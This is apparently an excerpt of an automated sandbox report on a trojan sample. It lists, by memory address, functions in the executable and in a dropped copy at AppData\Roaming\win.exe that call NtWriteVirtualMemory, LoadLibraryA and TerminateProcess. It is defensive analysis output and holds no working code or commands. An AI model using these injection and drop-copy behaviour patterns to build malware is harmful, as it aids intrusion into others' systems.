Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B5C NtWriteVirtualMemory,	0_2_020B4B5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2F50	0_2_020B2F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0F9B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4797 NtWriteVirtualMemory,	0_2_020B4797
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2FA8	0_2_020B2FA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8BBE NtWriteVirtualMemory,	0_2_020B8BBE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4BB0 NtWriteVirtualMemory,	0_2_020B4BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0FEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B47F4 NtWriteVirtualMemory,	0_2_020B47F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4C16 NtWriteVirtualMemory,	0_2_020B4C16
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0C25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B104C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4847 NtWriteVirtualMemory,	0_2_020B4847
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8C44	0_2_020B8C44
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0C5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4C68 NtWriteVirtualMemory,	0_2_020B4C68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8C6D	0_2_020B8C6D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3063	0_2_020B3063
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4899 NtWriteVirtualMemory,	0_2_020B4899
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B1094
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0CA6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B10CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B44CF NtWriteVirtualMemory,	0_2_020B44CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0CC1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B30C4	0_2_020B30C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8CDA	0_2_020B8CDA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B48E3 NtWriteVirtualMemory,	0_2_020B48E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4CE4 NtWriteVirtualMemory,	0_2_020B4CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B60FA NtWriteVirtualMemory,	0_2_020B60FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,	0_2_020B28FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0CF3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3114	0_2_020B3114
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8D14	0_2_020B8D14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4D2A NtWriteVirtualMemory,	0_2_020B4D2A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B1120
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4520 NtWriteVirtualMemory,	0_2_020B4520
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4948 NtWriteVirtualMemory,	0_2_020B4948
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8D5C	0_2_020B8D5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B116C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B317B	0_2_020B317B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8D7E	0_2_020B8D7E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4570 NtWriteVirtualMemory,	0_2_020B4570
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4D83 NtWriteVirtualMemory,	0_2_020B4D83
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4985 NtWriteVirtualMemory,	0_2_020B4985
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0D91
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45B5 NtWriteVirtualMemory,	0_2_020B45B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8DC3	0_2_020B8DC3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4DE9 NtWriteVirtualMemory,	0_2_020B4DE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0DEF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45E0 NtWriteVirtualMemory,	0_2_020B45E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45E4 NtWriteVirtualMemory,	0_2_020B45E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B45F9 NtWriteVirtualMemory,	0_2_020B45F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8DFF	0_2_020B8DFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B31F4	0_2_020B31F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B49F4 NtWriteVirtualMemory,	0_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	16_2_020B0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,	16_2_020B1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A27 NtWriteVirtualMemory,	16_2_020B4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4638 NtWriteVirtualMemory,	16_2_020B4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3E30 NtWriteVirtualMemory,	16_2_020B3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4E36 NtWriteVirtualMemory,	16_2_020B4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3244	16_2_020B3244
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B7E78 NtWriteVirtualMemory,	16_2_020B7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A73 NtWriteVirtualMemory,	16_2_020B4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3275	16_2_020B3275
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4A87 NtWriteVirtualMemory,	16_2_020B4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4E99 NtWriteVirtualMemory,	16_2_020B4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4694 NtWriteVirtualMemory,	16_2_020B4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4AA0 NtWriteVirtualMemory,	16_2_020B4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B46D3 NtWriteVirtualMemory,	16_2_020B46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1ED7 NtWriteVirtualMemory,	16_2_020B1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2B01 NtWriteVirtualMemory,	16_2_020B2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B00 NtWriteVirtualMemory,	16_2_020B4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B2D NtWriteVirtualMemory,	16_2_020B4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B25 NtWriteVirtualMemory,	16_2_020B4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,	16_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4B5C NtWriteVirtualMemory,	16_2_020B4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2F50	16_2_020B2F50
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4797 NtWriteVirtualMemory,	16_2_020B4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B2FA8	16_2_020B2FA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8BBE NtWriteVirtualMemory,	16_2_020B8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4BB0 NtWriteVirtualMemory,	16_2_020B4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B47F4 NtWriteVirtualMemory,	16_2_020B47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4C16 NtWriteVirtualMemory,	16_2_020B4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4847 NtWriteVirtualMemory,	16_2_020B4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8C44	16_2_020B8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4C68 NtWriteVirtualMemory,	16_2_020B4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8C6D	16_2_020B8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3063	16_2_020B3063
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4899 NtWriteVirtualMemory,	16_2_020B4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B1094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B10CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B44CF NtWriteVirtualMemory,	16_2_020B44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B30C4	16_2_020B30C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8CDA	16_2_020B8CDA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B48E3 NtWriteVirtualMemory,	16_2_020B48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4CE4 NtWriteVirtualMemory,	16_2_020B4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B60FA NtWriteVirtualMemory,	16_2_020B60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,	16_2_020B28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0CF3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B3114	16_2_020B3114
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8D14	16_2_020B8D14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4D2A NtWriteVirtualMemory,	16_2_020B4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B1120
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4520 NtWriteVirtualMemory,	16_2_020B4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4948 NtWriteVirtualMemory,	16_2_020B4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8D5C	16_2_020B8D5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B116C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B317B	16_2_020B317B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8D7E	16_2_020B8D7E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4570 NtWriteVirtualMemory,	16_2_020B4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4D83 NtWriteVirtualMemory,	16_2_020B4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4985 NtWriteVirtualMemory,	16_2_020B4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0D91
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45B5 NtWriteVirtualMemory,	16_2_020B45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8DC3	16_2_020B8DC3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B4DE9 NtWriteVirtualMemory,	16_2_020B4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,	16_2_020B0DEF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45E0 NtWriteVirtualMemory,	16_2_020B45E0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45E4 NtWriteVirtualMemory,	16_2_020B45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B45F9 NtWriteVirtualMemory,	16_2_020B45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B8DFF	16_2_020B8DFF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B31F4	16_2_020B31F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 16_2_020B49F4 NtWriteVirtualMemory,	16_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	17_2_007A0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1D2E NtWriteVirtualMemory,LoadLibraryA,	17_2_007A1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4C68 NtWriteVirtualMemory,	17_2_007A4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8C6D	17_2_007A8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3063	17_2_007A3063
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0C5B D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A104C D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4847 NtWriteVirtualMemory,	17_2_007A4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8C44	17_2_007A8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0C25 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4C16 NtWriteVirtualMemory,	17_2_007A4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A60FA NtWriteVirtualMemory,	17_2_007A60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A28FE NtWriteVirtualMemory,LoadLibraryA,	17_2_007A28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CF3 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0CF3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A48E3 NtWriteVirtualMemory,	17_2_007A48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4CE4 NtWriteVirtualMemory,	17_2_007A4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8CDA	17_2_007A8CDA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A10CB D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A10CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A44CF NtWriteVirtualMemory,	17_2_007A44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CC1 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A30C4	17_2_007A30C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0CA6 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4899 NtWriteVirtualMemory,	17_2_007A4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1094 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A1094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A317B	17_2_007A317B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8D7E	17_2_007A8D7E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4570 NtWriteVirtualMemory,	17_2_007A4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A116C D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A116C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8D5C	17_2_007A8D5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4948 NtWriteVirtualMemory,	17_2_007A4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4D2A NtWriteVirtualMemory,	17_2_007A4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1120 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A1120
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4520 NtWriteVirtualMemory,	17_2_007A4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3114	17_2_007A3114
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8D14	17_2_007A8D14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45F9 NtWriteVirtualMemory,	17_2_007A45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8DFF	17_2_007A8DFF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A31F4	17_2_007A31F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A49F4 NtWriteVirtualMemory,	17_2_007A49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4DE9 NtWriteVirtualMemory,	17_2_007A4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0DEF D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0DEF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45E0 NtWriteVirtualMemory,	17_2_007A45E0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45E4 NtWriteVirtualMemory,	17_2_007A45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8DC3	17_2_007A8DC3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A45B5 NtWriteVirtualMemory,	17_2_007A45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0D91 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0D91
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4D83 NtWriteVirtualMemory,	17_2_007A4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4985 NtWriteVirtualMemory,	17_2_007A4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A7E78 NtWriteVirtualMemory,	17_2_007A7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A73 NtWriteVirtualMemory,	17_2_007A4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3275	17_2_007A3275
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0E4D D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3244	17_2_007A3244
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4638 NtWriteVirtualMemory,	17_2_007A4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A3E30 NtWriteVirtualMemory,	17_2_007A3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4E36 NtWriteVirtualMemory,	17_2_007A4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A27 NtWriteVirtualMemory,	17_2_007A4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A46D3 NtWriteVirtualMemory,	17_2_007A46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A1ED7 NtWriteVirtualMemory,	17_2_007A1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0EB3 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4AA0 NtWriteVirtualMemory,	17_2_007A4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4E99 NtWriteVirtualMemory,	17_2_007A4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4694 NtWriteVirtualMemory,	17_2_007A4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0E80 D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4A87 NtWriteVirtualMemory,	17_2_007A4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B5C NtWriteVirtualMemory,	17_2_007A4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2F50	17_2_007A2F50
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2F3E NtWriteVirtualMemory,LoadLibraryA,	17_2_007A2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0F2F D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B2D NtWriteVirtualMemory,	17_2_007A4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B25 NtWriteVirtualMemory,	17_2_007A4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4B00 NtWriteVirtualMemory,	17_2_007A4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2B01 NtWriteVirtualMemory,	17_2_007A2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A47F4 NtWriteVirtualMemory,	17_2_007A47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0FEB D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A8BBE NtWriteVirtualMemory,	17_2_007A8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4BB0 NtWriteVirtualMemory,	17_2_007A4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A2FA8	17_2_007A2FA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A0F9B D3DKMTSetStablePowerState,TerminateProcess,	17_2_007A0F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 17_2_007A4797 NtWriteVirtualMemory,	17_2_007A4797
